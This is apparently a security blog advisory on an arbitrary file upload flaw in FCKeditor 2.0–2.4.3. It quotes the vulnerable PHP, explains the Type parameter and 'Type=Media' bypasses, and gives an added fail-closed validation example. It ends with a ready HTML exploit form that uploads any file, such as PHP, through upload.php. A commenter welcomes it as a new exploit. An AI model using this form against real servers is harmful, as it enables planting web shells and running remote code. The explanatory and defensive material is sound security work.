FCKeditor 2.0-2.4.3 Vulnerability - Securitatea Informatica

FCKeditor 2.0-2.4.3 Vulnerability

Date:
11 November 2010

Description:
Files with any extension can be uploaded to the server.

For versions 2.0 – 2.2 the vulnerable code is in the file FCKeditor/editor/filemanager/upload/php/upload.php:

$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

// Get the allowed and denied extensions arrays.
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;

so we can pass, as the GET parameter “Type”, any string that is not one of (File, Flash, Image); the allowed and denied extension arrays for that type are then undefined, so nothing is filtered and we can upload a file with any extension (e.g. .php)

For versions 2.3.0 – 2.4.3 the vulnerable code is in the file FCKeditor/editor/filemanager/upload/php/upload.php:

$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

// Check if it is an allowed type.
if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
    SendResults( 1, '', '', 'Invalid type specified' ) ;

// Get the allowed and denied extensions arrays.
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;

In this code the GET parameter “Type” is checked against a fixed list, but in config.php:

$Config['AllowedExtensions']['Media'] and $Config['DeniedExtensions']['Media'] do not exist. So if we send Type=Media as the GET parameter, the extension arrays are again undefined and we can upload the file as before.
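As an added example (not FCKeditor's own code or patch), this is a fail-closed version of the Type/extension check: a type that has no configured lists is rejected instead of passing with undefined arrays. It assumes the $Config layout of FCKeditor's config.php; the sample configuration and the isUploadPermitted function are constructed for illustration.

```php
<?php
// Added example (not FCKeditor's own code): a fail-closed version of the
// Type/extension check. Assumes FCKeditor's config.php layout for $Config.

// Constructed sample configuration; deliberately no 'Media' entry, mirroring
// the config.php mismatch described above.
$Config = array(
    'AllowedExtensions' => array(
        'File'  => array('zip', 'pdf', 'txt'),
        'Image' => array('jpg', 'jpeg', 'gif', 'png'),
        'Flash' => array('swf'),
    ),
    'DeniedExtensions' => array(
        'File'  => array('php', 'php3', 'php5', 'phtml', 'htaccess'),
        'Image' => array(),
        'Flash' => array(),
    ),
);

// Returns true only when $sType has both lists configured, the final
// extension is in the allowed list and not in the denied list. Unknown or
// unconfigured types (such as 'Media' here) are rejected instead of
// passing with undefined arrays, which is the root cause on this page.
function isUploadPermitted(array $Config, $sType, $fileName)
{
    if (!isset($Config['AllowedExtensions'][$sType])
        || !isset($Config['DeniedExtensions'][$sType])) {
        return false; // fail closed: type not configured
    }
    $arAllowed = array_map('strtolower', $Config['AllowedExtensions'][$sType]);
    $arDenied  = array_map('strtolower', $Config['DeniedExtensions'][$sType]);

    // An empty allowed list means nothing is allowed, not "everything".
    if (count($arAllowed) === 0) {
        return false;
    }
    // Judge only the final extension, lower-cased, so 'x.PHP' and 'a.jpg.php'
    // are both evaluated as 'php'.
    $sExtension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
    if ($sExtension === '' || in_array($sExtension, $arDenied, true)) {
        return false;
    }
    return in_array($sExtension, $arAllowed, true);
}

// Constructed checks for the cases discussed in the post.
var_dump(isUploadPermitted($Config, 'Media', 'shell.php')); // no 'Media' config
var_dump(isUploadPermitted($Config, 'File', 'shell.php'));  // denied extension
var_dump(isUploadPermitted($Config, 'Image', 'photo.jpg')); // allowed
```

The same fail-closed rule applies to the 2.0 – 2.2 variant, where Type is never checked at all: any value without a configured list should be rejected before the extension is examined.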

Exploit:

<form action="http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" enctype="multipart/form-data" method="post">
    <input name="NewFile" type="file" />
    <input type="submit" value="submit" />
</form>



One response to “FCKeditor 2.0-2.4.3 Vulnerability”

  1. hehehe… a new exploit for fckeditor is welcome. The old one had gotten a bit rusty :)

